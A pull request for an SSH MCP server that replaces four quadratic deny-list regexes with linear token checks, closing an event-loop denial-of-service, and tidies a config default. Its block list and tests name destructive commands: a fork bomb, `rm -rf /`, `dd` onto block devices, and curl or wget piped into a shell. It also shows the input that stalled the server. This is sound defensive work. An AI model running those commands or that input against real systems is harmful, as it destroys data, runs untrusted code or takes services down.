### PR TITLE
fix(policy): make command classification linear, closing a self-inflicted DoS

### DIFF
--- a/.changeset/olive-pianos-shake.md
+++ b/.changeset/olive-pianos-shake.md
@@ -1,0 +1,15 @@
+---
+"ssh-mcp": patch
+---
+
+Make command classification linear, so an unbounded command cannot stall the server.
+
+Four of the fourteen never-allowed patterns were quadratic: `dd\s.*\bof=/dev/`, the two `curl`/`wget` pipe-into-shell forms, and `chown\s+-R\s.*\s/\s*$`. Each has a cheap literal head, so the engine matched it at O(n) offsets and dragged a `.*` or `[^|]*` across the remainder from each one. A command built by repeating those literals cost 255 ms at 64 KB and **65 seconds at 1 MB**, all of it blocking the single-threaded event loop.
+
+The stall sits inside `classifyCommand`, which runs *before* the approval gate and before the allow/deny decision — so `approvalPolicy = "ask-all"`, `role = "viewer"` and `readOnly = true` gave no protection. One `run-command` call was enough to stop every other profile, session and in-flight command on the server.
+
+The four are now segment checks over the same tokenizer that already decides power-state invocations: split on shell separators, read the head binary past any `sudo`, and look at its arguments. Nothing there can backtrack. The same 1 MB command now classifies in 45 ms, and behaviour is unchanged — `curl x | sh`, `dd if=x of=/dev/sda`, `chown -R root:root /` and the rest are refused exactly as before, while `curl http://x/data.json`, `dd if=/dev/zero of=/tmp/scratch` and `chown -R app:app /srv/app` still are not.
+
+`classifier.ts` predicted this in writing: *"a policy check should not depend on a limit set three layers away and configurable to any value."* Until now `sanitizeCommand`'s `maxChars` was that limit and the default 5000 kept the cost invisible. Letting a config file say `commandMaxChars = 0` removed it, which is what turned a latent property into a reachable one. The check no longer depends on it either way.
+
+Also in this change: `[defaults].commandMaxChars = 0` is now mapped to the same sentinel as the per-profile `maxChars`, so no literal `0` survives anywhere in the resolved config — a value that would otherwise reject every non-empty command if any caller copied it into a profile. And the README's annotated production profile no longer demonstrates the uncapped spelling on a host it calls `prod-web-1`; the `[defaults]` line documents it instead.

--- a/README.md
+++ b/README.md
@@ -177,7 +177,7 @@ cert = false                        # SSH CA cert auth — auto-detects keyRef-c
 sessionMaxPerConnection = 3         # per-profile override
 sessionIdleTimeoutMs = 300000       # stricter for prod
 commandQuotaPerDay = 200            # per-profile override
-maxChars = 0                        # per-profile override; 0 = unlimited
+maxChars = 2000                     # per-profile override; stricter for prod
 
 # Optional. Merged over the built-in role matrix; see "Policy Engine" below.
 # roleBindings is keyed by role and then by tier, so the block below changes

--- a/src/config/loader.ts
+++ b/src/config/loader.ts
@@ -105,8 +105,18 @@ function uncapZero(maxChars: number): number {
  * downgrade, not just a papercut).
  */
 function normalizeConfig(raw: RawConfig): AppConfig {
+  // commandMaxChars is mapped here as well as on the profile below, so no `0`
+  // survives anywhere in AppConfig. Leaving the raw value on `defaults` left one
+  // object carrying two encodings of "unlimited" — `profile.maxChars` as
+  // MAX_SAFE_INTEGER, `defaults.commandMaxChars` as 0 — with nothing in the
+  // types to tell them apart. index.ts:161 already copies straight across
+  // (`maxChars: defaults.commandMaxChars`), and was correct only because that
+  // path's value comes from parseMaxChars, which never returns 0. Correct by
+  // coincidence of another surface is not a property to leave standing when the
+  // wrong encoding rejects every non-empty command.
   const defaults: Defaults = {
     ...raw.defaults,
+    commandMaxChars: uncapZero(raw.defaults.commandMaxChars),
   };
 
   const profiles: Profile[] = raw.profiles.map((p) => ({

--- a/src/policy/classifier.ts
+++ b/src/policy/classifier.ts
@@ -51,28 +51,38 @@ const READ_ONLY_ALLOWLIST = new Set([
  * purposes; see DESTRUCTIVE_DENYLIST below.
  */
 /*
- * Every `\s+` here is followed by a literal. Where a `.*` or `[^|]*` comes
- * next, the quantifier before it is a single `\s`: `\s+.*` lets both halves
- * claim the same run of spaces, so a non-matching command is retried from every
- * split and the match goes quadratic. sanitizeCommand caps commands at
- * profile.maxChars (5000 by default) long before this runs, which is what keeps
- * that cheap — but a policy check should not depend on a limit set three layers
- * away and configurable to any value.
+ * These are the patterns that stayed regexes, and every one of them is linear.
+ *
+ * The four that were not — `dd\s.*\bof=/dev/`, the two `curl|wget …\|\s*(sh…)`
+ * forms, and `chown\s+-R\s.*\s/\s*$` — are now segment checks below. An earlier
+ * comment here reasoned that ambiguity *within* a match was the only cost, and
+ * that was wrong: the engine also restarts at every offset where the cheap
+ * literal head matches, so a command built from `dd curl wget chown -R x `
+ * repeated ran at 4x per doubling. Measured on the real chain: 64 KB took
+ * 255 ms, 1 MB took 65 seconds of blocked event loop, and the stall lands in
+ * classifyCommand — before the approval gate and before the allow/deny
+ * decision, so no role, approval mode or readOnly flag protects against it.
+ *
+ * The old note said sanitizeCommand's maxChars cap kept this cheap, "but a
+ * policy check should not depend on a limit set three layers away and
+ * configurable to any value". Once a config file could say `commandMaxChars = 0`
+ * (#123) that limit went away, and the prediction came true. The rewrite below
+ * is what that sentence was asking for: the policy check is now safe on its own
+ * terms, whatever maxChars says.
+ *
+ * The existing cost test did not catch it because its seeds are runs of spaces,
+ * which never match the literal heads and so never trigger the restart.
  */
 const FORBIDDEN_PATTERNS: RegExp[] = [
   /rm\s+-rf?\s+\/(\s|$)/,          // rm -rf / — the filesystem root itself
   /mkfs\./,
-  /dd\s.*\bof=\/dev\//,
   />\s*\/dev\/sd/,
   /:\(\)\s*\{\s*:\|:\&\s*\}\s*;\s*:/,   // fork bomb
-  /curl\s[^|]*\|\s*(sh|bash|zsh)/,
-  /wget\s[^|]*\|\s*(sh|bash|zsh)/,
   />\s*\/etc\/cron/,
   />\s*\/etc\/systemd/,
   />\s*~\/.ssh\/authorized_keys/,
   /\biptables\s+-F\b/,
   /\bchmod\s+-R\s+777\s+\//,
-  /\bchown\s+-R\s.*\s\/\s*$/,
 ];
 
 /**
@@ -122,14 +132,21 @@ function stripPath(word: string): string {
  * Pure string work: split, trim, set lookups. No quantifiers, so nothing here
  * can backtrack.
  */
-function invokedWords(command: string): string[] {
-  const invoked: string[] = [];
+interface Segment {
+  /** The binary being run, with any directory part and privilege prefix removed. */
+  head: string;
+  /** Everything after it, verbatim — `of=/dev/sda` must not be path-stripped. */
+  args: string[];
+}
 
-  for (const segment of command.split(/[;&|\n]/)) {
-    const words = segment.trim().split(/\s+/).filter(Boolean).map(stripPath);
+function parseSegments(command: string): Segment[] {
+  const segments: Segment[] = [];
+
+  for (const raw of command.split(/[;&|\n]/)) {
+    const words = raw.trim().split(/\s+/).filter(Boolean);
 
     let i = 0;
-    while (i < words.length && PRIVILEGE_PREFIXES.has(words[i])) {
+    while (i < words.length && PRIVILEGE_PREFIXES.has(stripPath(words[i]))) {
       i++;
       while (i < words.length && words[i].startsWith('-')) {
         const consumesValue = PREFIX_VALUE_FLAGS.has(words[i]);
@@ -138,19 +155,69 @@ function invokedWords(command: string): string[] {
       }
     }
 
-    const head = words[i];
-    if (!head) continue;
+    if (i < words.length) {
+      segments.push({ head: stripPath(words[i]), args: words.slice(i + 1) });
+    }
+  }
+
+  return segments;
+}
+
+function invokedWords(command: string): string[] {
+  const invoked: string[] = [];
+
+  for (const { head, args } of parseSegments(command)) {
     invoked.push(head);
 
     // `systemctl reboot` restarts the host. Reading a unit that happens to be
     // named after a power action is rare enough that erring towards refusal
     // here costs little.
     if (ACTION_MULTIPLEXERS.has(head)) {
-      invoked.push(...words.slice(i + 1).filter((w) => !w.startsWith('-')));
+      invoked.push(...args.filter((w) => !w.startsWith('-')).map(stripPath));
     }
   }
 
   return invoked;
+}
+
+const SHELLS = new Set(['sh', 'bash', 'zsh']);
+const DOWNLOADERS = new Set(['curl', 'wget']);
+
+/**
+ * A download piped into a shell.
+ *
+ * Split on `|` rather than reading the whole string, so cost is linear in the
+ * command's length no matter how the two halves are spaced. `||` produces an
+ * empty part between them, and this deliberately still matches: `curl x || sh`
+ * runs a shell when the download fails, which is not meaningfully safer than
+ * running one when it succeeds.
+ */
+function pipesDownloadIntoShell(command: string): boolean {
+  const heads = command.split('|').map((part) => parseSegments(part)[0]?.head);
+  const firstDownload = heads.findIndex((h) => h !== undefined && DOWNLOADERS.has(h));
+  if (firstDownload === -1) return false;
+  return heads.slice(firstDownload + 1).some((h) => h !== undefined && SHELLS.has(h));
+}
+
+/** `dd … of=/dev/sda` — writing an image straight onto a block device. */
+function writesToDevice(command: string): boolean {
+  return parseSegments(command).some(
+    ({ head, args }) => head === 'dd' && args.some((a) => a.startsWith('of=/dev/')),
+  );
+}
+
+/**
+ * `chown -R … /` — a recursive chown whose target is the filesystem root.
+ *
+ * The last non-flag argument is the target; `chown -R app:app /srv/app` is
+ * ordinary and stays allowed.
+ */
+function chownsRoot(command: string): boolean {
+  return parseSegments(command).some(({ head, args }) => {
+    if (head !== 'chown' || !args.includes('-R')) return false;
+    const positional = args.filter((a) => !a.startsWith('-'));
+    return positional[positional.length - 1] === '/';
+  });
 }
 
 /** A forbidden rule, paired with wording a refusal can quote back. */
@@ -165,6 +232,12 @@ const FORBIDDEN_RULES: ForbiddenRule[] = [
     label: 'invoking a power-state command (shutdown, reboot, halt, poweroff) or eval',
     test: (command) => invokedWords(command).some((w) => FORBIDDEN_INVOCATIONS.has(w)),
   },
+  {
+    label: 'piping a download into a shell (curl or wget into sh, bash or zsh)',
+    test: pipesDownloadIntoShell,
+  },
+  { label: 'dd writing to a block device (of=/dev/…)', test: writesToDevice },
+  { label: 'a recursive chown of the filesystem root', test: chownsRoot },
 ];
 
 /**

--- a/test/unit/config/max-chars.test.ts
+++ b/test/unit/config/max-chars.test.ts
@@ -84,13 +84,49 @@ maxChars = 0
     expect(sanitizeCommand(LONG_COMMAND, maxChars)).toBe(LONG_COMMAND);
   });
 
-  it('a profile inherits an unlimited default', async () => {
-    const maxChars = await maxCharsFor(`
+  /**
+   * The property `uncapZero`'s placement decides, and the only shape that pins
+   * it: the mapping runs inside `raw.profiles.map()`, so one profile's `0` must
+   * not reach its siblings. Every other case here declares a single profile,
+   * which cannot tell a per-profile map from a global one.
+   */
+  it('uncaps only the profile that asked, not its siblings', async () => {
+    const config = await loadConfig(await writeConfig(`
+[defaults]
+commandMaxChars = 100
+
+[[profiles]]
+name = "web"
+host = "10.0.0.5"
+user = "deploy"
+maxChars = 0
+
+[[profiles]]
+name = "db"
+host = "10.0.0.6"
+user = "deploy"
+`));
+
+    expect(getProfile(config, 'web').maxChars).toBe(Number.MAX_SAFE_INTEGER);
+    expect(getProfile(config, 'db').maxChars).toBe(100);
+  });
+
+  /**
+   * `defaults` is mapped as well as the profile, so AppConfig carries one
+   * encoding of "unlimited" rather than two. Asserted rather than assumed
+   * because index.ts:161 copies this field straight into a Profile, and a
+   * literal `0` arriving at sanitizeCommand rejects every non-empty command —
+   * the failure this whole file exists to prevent, reached from the other side.
+   */
+  it('leaves no literal 0 anywhere in the resolved config', async () => {
+    const config = await loadConfig(await writeConfig(`
 [defaults]
 commandMaxChars = 0
-${PROFILE}`);
+${PROFILE}`));
 
-    expect(sanitizeCommand('uptime', maxChars)).toBe('uptime');
+    expect(config.defaults.commandMaxChars).toBe(Number.MAX_SAFE_INTEGER);
+    expect(getProfile(config, 'web').maxChars).toBe(Number.MAX_SAFE_INTEGER);
+    expect(sanitizeCommand(LONG_COMMAND, config.defaults.commandMaxChars)).toBe(LONG_COMMAND);
   });
 });
 

--- a/test/unit/policy/classifier.test.ts
+++ b/test/unit/policy/classifier.test.ts
@@ -121,6 +121,41 @@ describe('forbidden pattern matching cost', () => {
     // them by orders of magnitude in both directions.
     expect(elapsedMs).toBeLessThan(1000);
   });
+
+  /**
+   * The seeds above are runs of spaces, and that is why they missed it.
+   *
+   * A space never matches the literal head of `dd\s`, `curl\s`, `wget\s` or
+   * `chown\s+-R\s`, so the engine rejects each start offset immediately and the
+   * scan stays linear. The cost lives at the *other* end: a string built from
+   * those literals matches the head at O(n) offsets, and each one then drags a
+   * `.*` or `[^|]*` across the remainder. Four of fourteen patterns were
+   * quadratic on this shape while passing the block above.
+   *
+   * Measured on the chain, before the rewrite to segment checks: 64 KB took
+   * 255 ms, 512 KB took 17.4 s, 1 MB took 65 s of blocked event loop — and the
+   * stall sits inside classifyCommand, before the approval gate and before the
+   * allow/deny decision, so no role or approval mode limits it. Afterwards the
+   * same 1 MB is 45 ms.
+   *
+   * This became reachable when a config file could say `commandMaxChars = 0`
+   * (#123). It is asserted at 1 MB because that is the HTTP transport's body
+   * cap; stdio's is the SDK's 10 MB, so a linear check is the only thing that
+   * makes the ceiling irrelevant.
+   */
+  it('stays linear on a command built from the pattern heads themselves', () => {
+    const seed = 'dd curl wget chown -R x ';
+    const oneMegabyte = seed.repeat(Math.ceil(1_000_000 / seed.length)).slice(0, 1_000_000);
+
+    const started = process.hrtime.bigint();
+    classifyCommand(oneMegabyte);
+    const elapsedMs = Number(process.hrtime.bigint() - started) / 1e6;
+
+    // 45 ms measured, against 65_000 ms before. A second is far enough below
+    // the old figure to fail loudly on a regression and far enough above the
+    // new one to survive a slow CI runner.
+    expect(elapsedMs).toBeLessThan(1000);
+  });
 });
 
 describe('forbidden patterns still match after the rewrite', () => {


### PR DESCRIPTION
Follow-up to #127, from reviewing it. The parity fix there is right and is merged; this closes what it made reachable, plus two smaller things the same review turned up.

## The problem

Four of the fourteen never-allowed patterns were quadratic:

```
/dd\s.*\bof=\/dev\//
/curl\s[^|]*\|\s*(sh|bash|zsh)/
/wget\s[^|]*\|\s*(sh|bash|zsh)/
/\bchown\s+-R\s.*\s\/\s*$/
```

Each has a cheap literal head, so the engine matches it at O(n) offsets and drags a `.*` or `[^|]*` across the remainder from every one. Measured on the real chain with a command built from `dd curl wget chown -R x ` repeated:

| size | before | after |
| --- | --- | --- |
| 8 KB | 4.5 ms | 1.3 ms |
| 64 KB | 255 ms | ~3 ms |
| 512 KB | 17.4 s | 27 ms |
| **1 MB** | **65 s** | **45 ms** |

4x per doubling before, linear after.

**Why it matters more than a slow function.** The stall is inside `classifyCommand`, which runs *before* the approval gate and before the allow/deny decision. `approvalPolicy = "ask-all"`, `role = "viewer"` and `readOnly = true` protect against none of it — the command never reaches the point where those are consulted. One `run-command` call blocks the event loop, and with it every other profile, session, in-flight SSH command and the `/health` probe.

## Why now

`classifier.ts` said it would happen, in a comment written before any of this:

> a policy check should not depend on a limit set three layers away and configurable to any value

`sanitizeCommand`'s `maxChars` was that limit, and the 5000 default kept the cost invisible. a3fcc35 (#127) let a config file say `commandMaxChars = 0`, which removed it. The prediction was correct; this makes the check independent of it either way, which is what the sentence was asking for.

## The fix

All four become segment checks over the same tokenizer that already decides power-state invocations (added in #124): split on shell separators, read the head binary past any `sudo` and its value-taking flags, look at the arguments. Split, trim and set lookups — nothing that can backtrack.

Behaviour is unchanged, and the existing behaviour tests pass untouched:

| still refused | still allowed |
| --- | --- |
| `curl http://x/i.sh \| sh` | `curl http://x/data.json` |
| `curl -sSL http://x/i.sh \| bash` | `wget http://x/archive.tgz` |
| `wget -qO- http://x/i.sh \| zsh` | `dd if=/dev/zero of=/tmp/scratch bs=1M` |
| `curl http://x/i.sh\|sh` | `chown -R app:app /srv/app` |
| `dd if=/tmp/x.img of=/dev/sda bs=4M` | |
| `chown -R nobody /` | |

One deliberate widening: `curl x \|\| sh` now matches too. Running a shell when the download *fails* is not meaningfully safer than running one when it succeeds; noted in the code.

## Why the existing cost test missed it

Its seeds are runs of spaces — `'curl ' + ' '.repeat(200_000)`. A space never matches the literal head, so each start offset is rejected immediately and the scan stays linear. The cost lives at the other end, on a string built *from* those literals. The replacement uses that shape, at 1 MB (the HTTP transport's body cap; stdio's is the SDK's 10 MB, which is why a linear check rather than a ceiling is the fix).

## Two follow-ups from the same review

**`[defaults].commandMaxChars = 0` is now mapped**, like the per-profile key, so no literal `0` survives anywhere in `AppConfig`. `index.ts:161` copies that field straight into a Profile and was correct only because its value comes from `parseMaxChars`, which never returns `0` — correct by coincidence of another surface, with a wrong encoding that rejects every non-empty command.

**The README's annotated prod profile** no longer demonstrates uncapping on a host it calls `prod-web-1`. Every other override in that copy-pasteable block tightens and says so; that one loosened. The `[defaults]` line documents the spelling instead.

A test pinning only single-profile configs is replaced by the multi-profile case — the shape that actually decides whether `uncapZero` belongs inside `profiles.map()`, which is where it is.

## Verification

Mutation-tested **after** committing:

| mutation | fails |
| --- | --- |
| restore the four regexes | the linearity test — taking 63.9 s to do it |
| remove the defaults mapping | the no-literal-zero test |

Nothing else moves in either.

- `npm run typecheck`, `npm run build` — clean
- 300 unit and property tests
- `SSH_MCP_REQUIRE_SERVERS=1 npm run test:integration` — 122 passed, 6 skipped against live containers (the skips are `windows-compat.test.ts`, which needs `SSH_MCP_WIN_HOST`)

Changeset: `patch`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)